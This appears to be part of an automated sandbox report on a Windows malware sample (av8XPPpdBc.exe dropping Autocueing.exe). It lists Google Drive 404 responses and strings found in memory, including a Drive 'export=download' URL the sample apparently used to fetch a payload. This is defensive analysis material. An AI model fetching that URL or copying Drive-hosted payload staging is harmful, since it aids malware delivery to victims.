      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC76krFNKrWk2era1CLv4MbRxEgmz_nfuGCHq1RVD8g1_UWo3K6LSMp6nc3tgQK0KapKContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 04:28:54 GMTCross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-wnKkzTf98lew9WJKLRDlxw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5JyON8aNtOox4u7xav2NZ84Q8nsp5H9-BaLv35dhSk0iulRMLbe4Ez5kv8y2LueJZvContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 04:28:56 GMTContent-Security-Policy: script-src 'nonce-BGOonSUYkufnMVzv9c35tA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgQzs32MxJrFS3F9gKWhpEUGzMuNjqOp9QTTGw8MEZswz0d0bRirdZTbkDlf3ppvvASn8lzoGzIContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 04:28:58 GMTContent-Security-Policy: script-src 'nonce-Pa1J2QkUsDZKUOWdYX-70w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgTGxi-imLV30YR0MPMeeWzNJqky7yS09xqzaOM3-4fIMSJl52zbbsWtvNePzBB1lMg3Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 04:29:01 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: script-src 'nonce-QW5DyroVhUhgbrgA_sTTwQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4WnCNcuhRYqGsGQpBrAZ0JQAssf2gN7F90zv_2JFB8_mYHudLBwwahGTNhCDIw6_0HnD1EddoContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 04:29:03 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'nonce-hCCoLovpycFQS0Jk5VH8uQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgT72STby2HpL8BfreZE_9hFyCve7O0nTXiHOd2kBVSE9AQa4NlO3iv_SrEacfmd4Z6xContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 04:29:06 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-VgnnsdqBP72rJbq2pd_sfQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgTA7uK8NWEqkwmM9uFlVuFGAsg1auwHDoQxzWHYZYoWAYhf6XGYR-3RzBWJmtqQu-olContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 04:29:08 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-Zn9Jjjap9ICX0aRIC6El9g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: powershell.exe, 00000002.00000002.2522268759.00000000073D0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.microsoft
      Source: av8XPPpdBc.exe, Autocueing.exe.2.dr String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
      Source: powershell.exe, 00000002.00000002.2519636731.0000000005BC5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
      Source: powershell.exe, 00000002.00000002.2516453019.0000000004CB6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
      Source: powershell.exe, 00000002.00000002.2516453019.0000000004CB6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
      Source: powershell.exe, 00000002.00000002.2516453019.0000000004B61000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
      Source: powershell.exe, 00000002.00000002.2516453019.0000000004CB6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
      Source: powershell.exe, 00000002.00000002.2516453019.0000000004CB6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
      Source: Autocueing.exe, 00000008.00000001.2515081160.0000000000649000.00000020.00000001.01000000.00000008.sdmp String found in binary or memory: http://www.ftp.ftp://ftp.gopher.
      Source: Autocueing.exe, 00000008.00000001.2515081160.00000000005F2000.00000020.00000001.01000000.00000008.sdmp String found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd
      Source: Autocueing.exe, 00000008.00000001.2515081160.00000000005F2000.00000020.00000001.01000000.00000008.sdmp String found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd
      Source: powershell.exe, 00000002.00000002.2516453019.0000000004B61000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore6lB
      Source: powershell.exe, 00000002.00000002.2516453019.0000000004CB6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/winsvr-2022-pshelp
      Source: Autocueing.exe, 00000008.00000003.3006734632.000000000345E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://apis.google.com
      Source: powershell.exe, 00000002.00000002.2519636731.0000000005BC5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
      Source: powershell.exe, 00000002.00000002.2519636731.0000000005BC5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
      Source: powershell.exe, 00000002.00000002.2519636731.0000000005BC5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
      Source: Autocueing.exe, 00000008.00000003.3006734632.000000000345E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/
Autocueing.exe, 00000008.00000003.3242196784.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3230193224.0000000003463000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/7mPqiekafjqjNlgzAtvpzw_A7pqv34&export=downloadl
      Source: Autocueing.exe, 00000008.00000003.3346088252.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3312768786.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3334442052.0000000003465000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2995816614.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3089505610.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3042334490.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3279195163.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000002.3395765664.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3256468742.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3324327497.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3302032884.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2982316924.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3391633613.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2956303775.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3242307516.0000000003463000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2945425525.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3018318612.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3100280584.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3076301554.000000000345E000.00000004.00000020.00020000.00000000.sdmp, 
Autocueing.exe, 00000008.00000003.3229828688.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3368992406.000000000345E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/7mPqiekafjqjNlgzAtvpzw_A7pqv34&export=downloadt
      Source: Autocueing.exe, 00000008.00000003.3346088252.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3312768786.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3193568265.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3334442052.0000000003465000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3122962700.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3089505610.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3042334490.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3279195163.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000002.3395765664.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3147400004.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3256468742.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3324327497.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3302032884.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3159034020.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3391633613.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3242307516.0000000003463000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3018318612.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3206827523.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3136123204.0000000003463000.00000004.00000020.00020000.00000000.sdmp, 
Autocueing.exe, 00000008.00000003.3170311174.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3100280584.000000000345E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/7mPqiekafjqjNlgzAtvpzw_A7pqv34&export=downloadz5b
      Source: Autocueing.exe, 00000008.00000003.3256468742.000000000345E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/F
      Source: Autocueing.exe, 00000008.00000003.2852974758.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2806891781.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2971489970.000000000345E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/H
      Source: Autocueing.exe, 00000008.00000002.3395765664.00000000033F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/V9
      Source: Autocueing.exe, 00000008.00000003.3324327497.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3302032884.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2731411699.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2635189602.000000000345E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/X
      Source: Autocueing.exe, 00000008.00000003.2609864429.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2609988304.0000000003463000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/b
      Source: Autocueing.exe, 00000008.00000003.2780528849.0000000003463000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2830233002.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2933747254.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2778129056.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2887404715.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2945425525.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2876323516.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2754450948.0000000003462000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2754294780.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2765237850.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2818489505.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2731411699.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2852974758.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2899186565.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2910627021.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2922227503.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2806891781.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2864019301.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2791678279.000000000345E000.00000004.00000020.00020000.00000000.sdmp, 
Autocueing.exe, 00000008.00000003.2765349755.0000000003462000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2841476240.000000000345E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/d.google.com
      Source: Autocueing.exe, 00000008.00000003.3346088252.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3380044025.00000000034A0000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3369098022.000000000349F000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3391633613.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3357341329.00000000034A0000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3346141316.000000000349E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3368992406.000000000345E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/eXr
      Source: Autocueing.exe, 00000008.00000003.2780528849.0000000003463000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2708087359.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2830233002.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2778129056.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2876323516.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2754450948.0000000003462000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2754294780.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2765237850.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2818489505.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2731411699.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2852974758.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2719652725.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2806891781.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2864019301.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2791678279.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2765349755.0000000003462000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2841476240.000000000345E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/ertificates
      Source: Autocueing.exe, 00000008.00000003.2754450948.0000000003462000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2754294780.000000000345E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/f
      Source: Autocueing.exe, 00000008.00000003.2780528849.0000000003463000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2695356999.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2708087359.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2778129056.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2622041447.0000000003464000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2754450948.0000000003462000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2671904849.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2754294780.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2765237850.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2731411699.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2621619142.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2719652725.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2646384856.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2658888711.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2791678279.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2683597497.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2765349755.0000000003462000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2635189602.000000000345E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/h
